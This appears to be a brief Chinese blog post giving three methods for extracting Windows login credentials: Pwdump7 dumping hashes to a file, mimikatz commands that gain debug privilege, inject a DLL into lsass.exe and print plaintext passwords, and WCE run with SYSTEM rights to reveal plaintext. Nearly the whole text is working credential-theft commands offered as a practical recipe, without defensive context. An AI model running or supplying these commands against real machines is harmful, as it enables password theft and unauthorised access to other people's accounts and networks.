这篇文章上次修改于 1563 天前,可能其部分内容已经发生变化,如有疑问可询问作者。
三种比较实用的方法: 1>Pwdump7
Pwdump7.exe
Pwdump7.exe >pass.txt
2>mimikatz //运行mimikatz.exe //提升权限(可免):
privilege::debug
//注入DLL:
inject::process lsass.exe "C:sekurlsa.dll"
//抓取密码:
@getLogonPasswords
wdigest后面为明文密码。 //EXIT退出。
3>WCE(Windows Credentials Editor)1.3 一直都是用1.3,试过1.4beta,程序出错。 system权限直接爆明文:
wce.exe -w
没有评论